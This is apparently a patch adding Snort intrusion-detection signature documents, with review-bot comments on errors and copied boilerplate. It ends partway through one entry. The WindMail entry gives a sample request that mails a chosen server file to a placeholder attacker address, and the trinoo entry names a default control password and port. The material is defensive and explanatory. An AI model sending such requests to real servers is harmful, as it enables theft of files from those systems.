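Review bot: the Summary says the denial of service is triggered "via a NetShareEnum request" while Detailed Information says the crashing requests are NetServerEnum, NetServerEnum2 or NetServerEnum3; the two should agree. "NetServerEnum2 and NetServerEnum3 require anonymous access" presumably means those requests can be issued over an anonymous session, which is what makes the following sentence "Anonymous access is enabled by default." relevant; reword it. The deprecation notice ("This rule has been deprecated due to an inordinately large number of false positives. Rule 2101 has been modified to take this into account.") would be better placed before the Summary so readers see it first. Typos: "Microsfot", "recieves", "paramaters", "publicly availablet exploit" (should be "publicly available to exploit"), "feasable", and the False Positives sentence "verifying that the function that is being called is not feasable" is missing words (something like "verifying which function is being called is not feasible").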
--- /dev/null
+++ b/doc/signatures/100000863.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "PHPMyRing" application running on a webserver. Access to 
+the file "view_com.php" with SQL commands being passed as the "idsite" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "idsite" parameter in the "view_com.php" script used by 
+the "PHPMyRing" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyRing
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
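Review bot: the Sid field is empty (the "Sid:" header is followed directly by a blank line and "--"); the file name indicates 100000863, so fill it in, otherwise the document cannot be matched to its rule. The Contributors line "Nigel Houghton <nigel.houghton@sourcefire.com" is missing its closing ">", and the "--" after it lacks the preceding blank line used elsewhere (same for the "--" after Affected Systems). The third paragraph of Detailed Information is the generic CGI credential-validation boilerplate and does not describe SQL injection through the "idsite" parameter of "view_com.php"; the second paragraph already covers compromise of the database backend, so drop the third. Also "running ona web server" should be "running on a web server".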
--- /dev/null
+++ b/doc/signatures/944.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+944
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+In this case an attempt is being made to access the executable file
+fpremadm.exe from resources external to the protected network.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/resources/documentation/office/2000/all/reskit/en-us/75t4_5.mspx
+
+--
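Review bot: Detailed Information flags that access to fpremadm.exe is coming "from resources external to the protected network", but Corrective Action only says to patch; restricting access to fpremadm.exe to administrative hosts (or removing it where remote administration is not needed) is the more direct fix and should be listed. "attackers choosing" should be "attacker's choosing", and the Impact sentence "Denial of Service is possible." would read better joined to the preceding list of possible outcomes.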
--- /dev/null
+++ b/doc/signatures/1879.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1879
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
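Review bot: this is the same generic CGI text as 1053.txt and 1713.txt in this patch, with no indication of which script or request pattern sid 1879 matches; an analyst triaging the alert needs at least the targeted file name, and the Corrective Action cannot be followed without knowing which software to update. Typos: "running ona web server" and "attackers choosing".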
--- /dev/null
+++ b/doc/signatures/3054.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3054
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
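Review bot: Additional References is empty, yet Affected Systems pins the vulnerable range at "Ethereal 0.10.7 and prior", so the Ethereal release advisory for the first fixed version should be cited to support "Upgrade to the latest non-affected version of the software." Minor: "Apply the appropriate vendor supplied patch" is missing its terminating period, and the "None Known" entries should be "None known." to match the other files.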
--- /dev/null
+++ b/doc/signatures/3462.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3462
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer
+using the Content-Encoding parameter.
+
+--
+Impact:
+Serious. Code execution is possible.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle Content-Type or
+Content-Encoding headers returned from a server. It is possible to
+overflow a static buffer in urlmon.dll by supplying more than 300 bytes
+of data in the parameter for those headers.
+
+Specifically the error occurs when an image tag <img> is used to pass
+the excess data to both those header fields in a server response. Since
+some email clients use Internet Explorer to process HTML email messages,
+it is also possible to cause this overflow to occur via email.
+
+--
+Affected Systems:
+	Microsoft Windows systems
+
+--
+Attack Scenarios:
+An attacker can supply a malicious HTML file to a mail client containing
+excess data in the Content-Type and Content-Encoding headers that will
+overflow the buffer presenting them with the opportunity to write to
+various parts of memory and possibly execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References
+
+--
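Review bot: the last section header "Additional References" is missing its trailing colon, which will break any tooling that splits these files on "Header:" lines. The section is also empty even though Detailed Information names the exact component (urlmon.dll) and threshold (more than 300 bytes); the vendor bulletin should be cited, and a cross-reference to 100000118.txt in this same patch, which documents the Content-Type variant of the same overflow, would help analysts correlate the two events. Affected Systems "Microsoft Windows systems" is also vaguer than the Internet Explorer version list that 100000118.txt gives for the same bug.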
--- /dev/null
+++ b/doc/signatures/2521.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2521
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
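Review bot: "An attcker needs to make an SSL request" should be "attacker", and "Apply the appropriate vendor supplied patches" is missing its period. Additional References is empty although the text identifies the affected component (the Microsoft Secure Sockets Layer library) and platforms (Windows 2000, 2003 and XP); the Microsoft bulletin should be cited so the Corrective Action can be followed. Detailed Information never says which "invalid field" the rule inspects, which makes the False Positives "None known." claim hard to assess; state the field or handshake message that is matched.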
--- /dev/null
+++ b/doc/signatures/1713.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1713
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
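Review bot: the Detailed Information and Attack Scenarios text is identical to 1053.txt and 1879.txt in this patch and does not identify what request sid 1713 matches; add the script or URI pattern so the alert can be triaged and the right vendor patch found. Typos: "running ona web server" and "attackers choosing".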
--- /dev/null
+++ b/doc/signatures/1158.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+
+Sid:
+1158
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the executable
+file WindMail.exe using a web connection.
+
+--
+Impact:
+Remote attackers could subvert the WindMail mailer to read or execute
+arbitrary files on the web server
+
+--
+Detailed Information:
+WindMail is a commandline mail program for Windows.  It is sometimes
+deployed for scripting or for sending email through a web application.
+Some windmail deployments make webmail.exe a CGI application, which it was
+not designed to do.  The result is that an attacker could read or
+execute arbitrary files on the system that the web server has access to.
+It should never be a CGI application itself, and instead should be called
+by another program that properly filters input.
+
+--
+Affected Systems:
+	All systems using windmail.exe
+
+--
+Attack Scenarios:
+http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address
+
+--
+Ease of Attack:
+Simple crafting of a web GET request
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+If a CGI script calls windmail.exe, but windmail.exe itself is not a CGI
+application, then this rule will not generate an event. If the CGI
+application does not properly filter input, there is a possibility
+that the attack could still succeed.
+
+--
+Corrective Action:
+Look at the packet to determine whether a request was made via an HTTP GET
+for the windmail.exe application. If so, determine whether the attacked
+web server had windmail.exe on it.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
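Review bot: Detailed Information says "Some windmail deployments make webmail.exe a CGI application" but every other mention in the file, including the Summary and Affected Systems, is windmail.exe; "webmail.exe" looks like a typo and should be corrected, since an analyst searching the server for the wrong binary would miss it. "Original document author unkown" should be "unknown". The Corrective Action section describes how to triage the alert (inspect the packet, check whether windmail.exe is present on the attacked server) rather than how to fix the problem; the fix that Detailed Information already states, that windmail.exe "should never be a CGI application itself" and should only be called by a program that filters input, belongs here, with the triage steps kept as a separate note.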
--- /dev/null
+++ b/doc/signatures/100000353.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000353
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "tinyBB" application running on a webserver. Access to the file "footers.php" using a remote file being passed as the "tinybb_footers" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "tinybb_footers" parameter in the "footers.php" script used by the "tinyBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using tinyBB
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
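Review bot: as in 100000356.txt, the third paragraph of Detailed Information and the Attack Scenarios text are the generic CGI credential boilerplate and do not describe the remote file include through the "tinybb_footers" parameter of "footers.php" that the Summary and first paragraph describe; drop the boilerplate and describe the include scenario instead. Also fix "running ona web server", drop the two leading blank lines before "Rule:", and add the tinyBB advisory to the empty Additional References section.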
--- /dev/null
+++ b/doc/signatures/100000383.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000383
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "OsTicket" application running on a webserver. Access to the file "open_form.php" using a remote file being passed as the "include_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "include_path" parameter in the "open_form.php" script used by the "OsTicket" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using OsTicket
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
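Review bot: Affected Systems at "All systems running CGI applications using OsTicket" gives the analyst no version to check against; a rule written for "open_form.php" and "include_path" came from a specific advisory, and the affected versions and that advisory belong here and in the empty Additional References section. Attack Scenarios (the "supply his/her own credentials" text) is the generic CGI template and does not describe a file include, where the attacker puts a URL to a script under their control in the "include_path" parameter. "ona" in Detailed Information should be "on a".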
--- /dev/null
+++ b/doc/signatures/1840.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1840
+
+--
+Summary:
+This event is generated when a client on the protected network has 
+possibly visited a website containing malicious javascript code.
+
+--
+Impact:
+Minimal
+
+--
+Detailed Information:
+Implementations of Javascript in multiple browsers on multiple platforms
+contain an error that may lead to a user inadvertantly running
+Javascript code of an attackers choosing. IP address lookup for a fully
+qualified domain name is not performed when choosing whether Javascript 
+should be executed, if the hostname is served from a DNS server
+controlled by the attacker it may be possible for the attacker to run
+code of their choosing. 
+
+--
+Affected Systems:
+	Multiple browsers on multiple platforms.
+
+--
+Attack Scenarios:
+An attacker might try to fool a user into clicking a link in an email
+that points at an intranet server. The attacker is then able to run
+Javascript from a secondary host purporting to be the intranet server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+None known
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+
+-- 
+Additional References:
+
+--
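Review bot: Impact "Minimal" contradicts Detailed Information, which says the flaw lets an attacker run Javascript of their choosing in the user's browser as though it came from the intranet server named in Attack Scenarios; either state that impact (the script is treated as the intranet server's content) or explain why it is minimal. Detailed Information also never names the vulnerability or the affected browsers, and Additional References is empty; add the advisory or CVE the rule was written from. Spelling: "inadvertantly" should be "inadvertently", "an attackers choosing" should be "an attacker's choosing".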
--- /dev/null
+++ b/doc/signatures/1127.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1127
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
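Review bot: the documentation never says what this rule matches; Summary, Detailed Information and Attack Scenarios are generic text that would fit any web rule, so an analyst seeing SID 1127 fire cannot tell which request pattern triggered it or judge whether it is benign. State the URI or content the rule looks for and the product it targets, and revisit "False Positives: None known", which is not credible for a rule documented this generically.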
--- /dev/null
+++ b/doc/signatures/235.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+235
+
+--
+Summary:
+This event is generated when a trinoo DDoS attacker host communicates with a master host.  
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a trinoo attacker. If the listed destination IP is in your network, it may be a trinoo master.
+
+--
+Detailed Information:
+The trinoo DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, attackers communicate with masters to direct them to launch attacks.  An attacker may communicate with a master via TCP destination port 27665 with a string of "killme" in the payload.  This string is a default mdie password.
+
+--
+Affected Systems:
+Any trinoo compromised host.
+
+--
+Attack Scenarios:
+A trinoo attacker will communicate with masters to direct them to launch attacks.
+
+--
+Ease of Attack:
+Simple. trinoo code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+SecurityFocus:
+http://www.securityfocus.com/archive/1/37706
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html#trinoo
+
+--
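Review bot: "This string is a default mdie password" in Detailed Information leaves "mdie" unexplained; it is the trinoo master's "die" command, so "killme" on TCP/27665 is specifically an attacker telling a master to shut itself down, and the Summary and Attack Scenarios ("direct them to launch attacks") should say that rather than describing generic attack direction. Corrective Action could also give the obvious host check: a trinoo master listens on TCP/27665 and talks to daemons on UDP/27444 and UDP/31335, so a local listing of listening sockets on the suspected host confirms its role before a rebuild.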
--- /dev/null
+++ b/doc/signatures/100000380.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000380
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_smilies.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_smilies.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
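Review bot: the "phpbb_root_path" parameter in "admin_smilies.php" is a phpBB variable, so the affected component is the phpBB forum module bundled with phpNuke rather than phpNuke itself; Affected Systems should name the module and versions, and Additional References should carry the advisory. The credential-validation paragraph in Detailed Information does not apply to a file include and reads as copied boilerplate.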
--- /dev/null
+++ b/doc/signatures/100000788.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000788
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "FreeWebshop" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "page" parameter in the "search.php" script used by the "FreeWebshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using FreeWebshop
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
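Review bot: Impact and the second Detailed Information paragraph are copied from the file-include template and overstate a cross site scripting flaw: script injected through the "page" parameter of "search.php" runs in the browser of the user who follows the link, not on the web server, so "execute system binaries" and "unauthorized administrative access to the server" are wrong here. Restate Impact as theft of session cookies or credentials and actions performed in the victim's session, which is what the Attack Scenarios text already describes.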
--- /dev/null
+++ b/doc/signatures/930.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+930
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
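Review bot: like the other generic web rules in this patch, the ColdFusion doc does not identify which of the "many known vulnerabilities" this rule detects or the URI it matches, so SID 930 cannot be mapped to a patch or a CVE; name the ColdFusion component and request pattern and fill Additional References. The Impact claim of Denial of Service is not supported by anything in Detailed Information.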
--- /dev/null
+++ b/doc/signatures/100000816.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000816
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PC_CookBook" application running on a webserver. Access to the file "pccookbook.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "pccookbook.php" script used by the "PC_CookBook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
